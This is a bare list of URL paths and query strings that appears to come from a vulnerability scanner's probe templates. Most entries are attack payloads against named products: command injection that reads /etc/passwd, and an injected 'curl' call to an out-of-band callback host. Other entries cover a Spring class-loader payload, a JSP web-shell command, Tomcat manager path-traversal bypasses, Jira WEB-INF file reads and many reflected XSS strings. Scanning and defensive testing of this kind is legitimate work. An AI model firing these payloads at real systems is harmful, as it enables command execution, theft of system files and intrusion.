/filemanager/upload.php
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/wp-json/visualizer/v1/upload-data
/configWizard/keyUpload.jsp
/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
/api/users
/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
/defaultroot/officeserverservlet
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/meta
/api/snapshots
/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/api/sys/set_passwd
/service/~baseapp/UploadServlet
/{{randstr}}
/laravel-filemanager?type=Files
/{{randstr}}.php
/puppet-ca/v1/certificate_request/{{randstr}}
/?s={{randstr}}&c={{randstr}}&a={{randstr}}&m={{randstr}}
/docs/introduction.html
/..;/manager/html
/..;/..;/manager/html;/
/..;/host-manager/html
/..;/..;/host-manager/html;/
/{{randstr}}/..;/manager/html
/{{randstr}}/..;/host-manager/html
/remote/login?&err=--%3E%3Cscript%3Ealert(
/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E
/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F
/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E
/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>
/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a
/s/{{randstr}}/_/;/WEB-INF/web.xml
/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E
/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707
/templates/pages/debug_panel.php?id={{randstr}}
/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password
